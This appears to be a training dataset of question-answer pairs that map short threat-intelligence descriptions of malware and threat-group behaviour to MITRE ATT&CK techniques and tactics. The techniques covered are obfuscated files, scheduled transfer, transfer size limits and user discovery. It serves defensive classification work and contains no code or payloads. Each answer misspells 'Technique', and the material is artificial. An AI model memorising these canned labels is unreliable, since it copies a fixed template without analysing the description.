+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrongPity has used encrypted strings in its dropper component.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet uses encrypted configuration blocks and writes encrypted files to disk.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SysUpdate can encrypt and encode its configuration file.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TINYTYPHON has used XOR with 0x90 to obfuscate its configuration file.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APIs and strings in some TYPEFRAME variants are RC4 encrypted. Another variant is encoded with XOR.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Taidoor can use encrypted string blocks for obfuscation.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ThreatNeedle has been compressed and obfuscated using RC4, AES, or XOR.","Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Torisma has been Base64 encoded and AES encrypted.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot uses an AES CBC (256 bits) encryption algorithm for its loader and configuration files.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Most strings in USBStealer are encrypted using 3DES and XOR and reversed.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Uroburos can use AES and CAST-128 encryption to obfuscate resources.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ursnif has used an XOR-based algorithm to encrypt Tor clients dropped to disk. Ursnif droppers have also been delivered as password-protected zip files that execute base64 encoded PowerShell commands.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: VERMIN is obfuscated using the obfuscation tool called ConfuserEx.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A Volgmer variant is encoded using a simple XOR cipher.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The WastedLocker payload includes encrypted strings stored within the .bss section of the binary file.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Waterbear has used RC4 encrypted shellcode and encrypted functions.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WhisperGate can Base64 encode strings, store downloaded files in reverse byte order, and use the Eazfuscator tool to obfuscate its third stage.","Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WindTail can be delivered as a compressed, encrypted, and encoded payload.","Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Winnti for Linux can encode its configuration file with single-byte XOR encoding.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Winnti for Windows has the ability to encrypt and compress its payload.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Woody RAT has used Base64 encoded strings and scripts.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: YAHOYAH encrypts its configuration file using a simple algorithm.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZeroT has encrypted its payload with RC4.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zeus Panda encrypts strings with XOR. Zeus Panda also encrypts all configuration and settings in AES and RC4.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zox has been encoded with Base64.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxxZ has been encoded to avoid detection from static analysis tools.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: metaMain's module file has been encrypted via XOR.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: njRAT has included a base64 encoded executable.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Higaisa sent the victim computer identifier in a User-Agent string back to the C2 server every 10 minutes.,"Tecnique: T1029 Scheduled Transfer, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ADVSTORESHELL collects, compresses, encrypts, and exfiltrates data to the C2 server every 10 minutes.","Tecnique: T1029 Scheduled Transfer, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chrommme can set itself to sleep before requesting a new command from C2.,"Tecnique: T1029 Scheduled Transfer, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can set its Beacon payload to reach out to the C2 server on an arbitrary and random interval.,"Tecnique: T1029 Scheduled Transfer, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ComRAT has been programmed to sleep outside local business hours (9 to 5, Monday to Friday).","Tecnique: T1029 Scheduled Transfer, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dipsind can be configured to only run during normal working hours, which would make its communications harder to distinguish from normal traffic.","Tecnique: T1029 Scheduled Transfer, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Flagpro has the ability to wait for a specified time interval between communicating with and executing commands from C2.,"Tecnique: T1029 Scheduled Transfer, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kazuar can sleep for a specific time and be set to communicate at specific intervals.,"Tecnique: T1029 Scheduled Transfer, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LightNeuron can be configured to exfiltrate data during nighttime or working hours.,"Tecnique: T1029 Scheduled Transfer, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Linfo creates a backdoor through which remote attackers can change the frequency at which compromised hosts contact remote C2 infrastructure.,"Tecnique: T1029 Scheduled Transfer, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete sends stolen data to the C2 server every 10 minutes.,"Tecnique: T1029 Scheduled Transfer, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ninja can configure its agent to work only in specific time frames.,"Tecnique: T1029 Scheduled Transfer, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWERSTATS can sleep for a given number of seconds.,"Tecnique: T1029 Scheduled Transfer, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShadowPad has sent data back to C2 every 8 hours.,"Tecnique: T1029 Scheduled Transfer, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shark can pause C2 communications for a specified time.,"Tecnique: T1029 Scheduled Transfer, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShimRat can sleep when instructed to do so by the C2.,"Tecnique: T1029 Scheduled Transfer, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TinyTurla contacts its C2 based on a scheduled timing set in its configuration.,"Tecnique: T1029 Scheduled Transfer, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: jRAT can be configured to reconnect at certain intervals.,"Tecnique: T1029 Scheduled Transfer, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0015, the threat actors limited Rclone's bandwidth setting during exfiltration.","Tecnique: T1030 Data Transfer Size Limits, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0026, the threat actors split encrypted archives containing stolen files and information into 3MB parts prior to exfiltration.","Tecnique: T1030 Data Transfer Size Limits, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has split archived exfiltration files into chunks smaller than 1MB.,"Tecnique: T1030 Data Transfer Size Limits, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 transfers post-exploitation files dividing the payload into fixed-size chunks to evade detection.,"Tecnique: T1030 Data Transfer Size Limits, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LuminousMoth has split archived files into multiple parts to bypass a 5MB limit.,"Tecnique: T1030 Data Transfer Size Limits, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 actors have split RAR files for exfiltration into parts.,"Tecnique: T1030 Data Transfer Size Limits, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleSeed has divided files if the size is 0x1000000 bytes or more.,"Tecnique: T1030 Data Transfer Size Limits, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbanak exfiltrates data in compressed chunks if a message is larger than 4096 bytes .,"Tecnique: T1030 Data Transfer Size Limits, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike will break large data sets into smaller chunks for exfiltration.,"Tecnique: T1030 Data Transfer Size Limits, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Helminth splits data into chunks up to 23 bytes and sends the data in DNS queries to its C2 server.,"Tecnique: T1030 Data Transfer Size Limits, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kessel can split the data to be exilftrated into chunks that will fit in subdomains of DNS queries.,"Tecnique: T1030 Data Transfer Size Limits, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kevin can exfiltrate data to the C2 server in 27-character chunks.,"Tecnique: T1030 Data Transfer Size Limits, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mythic supports custom chunk sizes used to upload/download files.,"Tecnique: T1030 Data Transfer Size Limits, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ObliqueRAT can break large files of interest into smaller chunks to prepare them for exfiltration.,"Tecnique: T1030 Data Transfer Size Limits, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OopsIE exfiltrates command output and collected files to its C2 server in 1500-byte blocks.,"Tecnique: T1030 Data Transfer Size Limits, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POSHSPY uploads data in 2048-byte chunks.,"Tecnique: T1030 Data Transfer Size Limits, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RDAT can upload a file via HTTP POST response to the C2 split into 102,400-byte portions. RDAT can also download data from the C2 which is split into 81,920-byte portions.","Tecnique: T1030 Data Transfer Size Limits, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Rclone ""chunker"" overlay supports splitting large files in smaller chunks during upload to circumvent size limits.","Tecnique: T1030 Data Transfer Size Limits, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0017, APT41 used `whoami` to gather information from victim machines.","Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0018, the threat actors collected `whoami` information via PowerShell scripts.","Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Frankenstein, the threat actors used Empire to enumerate hosts and gather username, machine name, and administrative permissions information.","Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Night Dragon, threat actors used password cracking and pass-the-hash tools to discover usernames and passwords.","Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation CuckooBees, the threat actors used the `query user` and `whoami` commands as part of their advanced reconnaissance.","Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors enumerated sessions and users on a remote host, and identified privileged users logged into a targeted system.","Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT19 used an HTTP malware variant and a Port 22 malware variant to collect the victim’s username.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: An APT3 downloader uses the Windows command ""cmd.exe"" /C whoami to verify that it is running with the elevated privileges of “System.”","Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 collected the victim's username and executed the whoami command on the victim's machine. APT32 executed shellcode to collect the username on the victim's machine.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT37 identifies the victim username.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 has identified primary users, currently logged in users, sets of users that commonly use a system, or inactive users.","Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 used Remexi to collect usernames from the system.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 has executed whoami commands, including using the WMIEXEC utility to execute this on remote machines.","Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has used the quser command to show currently logged on users.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly used the command query user on victim hosts.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca collected information on user accounts via the whoami command.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN10 has used Meterpreter to enumerate users on remote systems.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 has used the command `cmd.exe /C quser` to collect user session information.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN8 has executed the command `quser` to display the session details of a compromised machine.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GALLIUM used whoami and query user to obtain information about the victim user.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A Gamaredon Group file stealer can gather the victim's username to send to a C2 server.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAFNIUM has used `whoami` to gather user information.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HEXANE has run `whoami` on compromised machines to identify the current user.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang has used implants capable of collecting the signed-in username.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Various Lazarus Group malware enumerates logged-on users.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LuminousMoth has used a malicious DLL to collect the username from compromised hosts.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound malware has obtained the victim username and sent it to the C2 server.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has used malware that can collect the victim’s username.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has run whoami on a victim.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Patchwork collected the victim username and whether it was running as admin, then sent the information to its C2 server.","Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has collected the username from a compromised host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sidewinder has used tools to identify the user of a compromised host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stealth Falcon malware gathers the registered user and primary owner name via WMI.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 has used `whoami` to collect system user information.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper used letmein to scan for saved usernames on the target system.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volt Typhoon has executed the PowerShell command `Get-EventLog security -instanceid 4624` to identify associated user and computer account names.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Windshift has used malware to identify the username on a compromised host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has used ""whoami"" to identify the local user and their privileges.","Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZIRCONIUM has used a tool to capture the username on a compromised host in order to register it with C2.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Action RAT has the ability to collect the username from an infected host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent Tesla can collect the username from the victim’s machine.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent.btz obtains the victim username and saves it to a file.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Amadey has collected the user name from a compromised host using `GetUserNameA`.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aria-body has the ability to identify the username on a compromised host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AsyncRAT can check if the current user of a compromised system is an administrator.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AuTo Stealer has the ability to collect the username from an infected host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Azorult can collect the username from the victim’s machine.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADHATCH can obtain logged user information from a compromised machine and can execute the command `whoami.exe`.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BISCUIT has a command to gather the username from the system.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLUELIGHT can collect the username on a compromised host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BabyShark has executed the whoami command.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Backdoor.Oldrea collects the current username from the victim.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar can identify the username of the infected user.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackCat can utilize `net use` commands to discover the user name on a compromised host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BloodHound can collect information on user sessions.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bonadan has discovered the username of the user running the backdoor.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BoomBox can enumerate the username on a compromised host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bumblebee has the ability to identify the user name.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cannon can gather the username from the system.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cardinal RAT can collect the username from a victim machine.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Caterpillar WebShell can obtain a list of user accounts from a victim's machine.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chaes has collected the username and UID from the infected machine.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chrommme can retrieve the username from a targeted system.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clambling can identify the username on a compromised host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CreepySnail can execute `getUsername` on compromised systems.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crimson can identify the user on a targeted system.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cryptoistic can gather data on the user of a compromised host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DRATzarus can obtain a list of users from an infected machine.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkComet gathers the username from the victim’s machine.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkWatchman has collected the username from a victim machine.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Denis enumerates and collects the username from the victim’s machine.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A Linux version of Derusbi checks if the victim user ID is anything other than zero (normally used for root), and the malware will not execute if it does not have root privileges. Derusbi also gathers the username of the victim.","Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Diavol can collect the username from a compromised host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DnsSystem can use the Windows user name to create a unique identification for infected users and systems.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DownPaper collects the victim username and sends it to the C2 server.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dyre has the ability to identify the users on a compromised host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EVILNUM can obtain the username from the victim's machine.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Egregor has used tools to gather information about users.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has enumerated all users connected to network shares.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can enumerate the username on targeted hosts.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Epic collects the user name from the victim’s machine.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Exaramel for Linux can run whoami to identify the system owner.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Explosive has collected the username from the infected host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
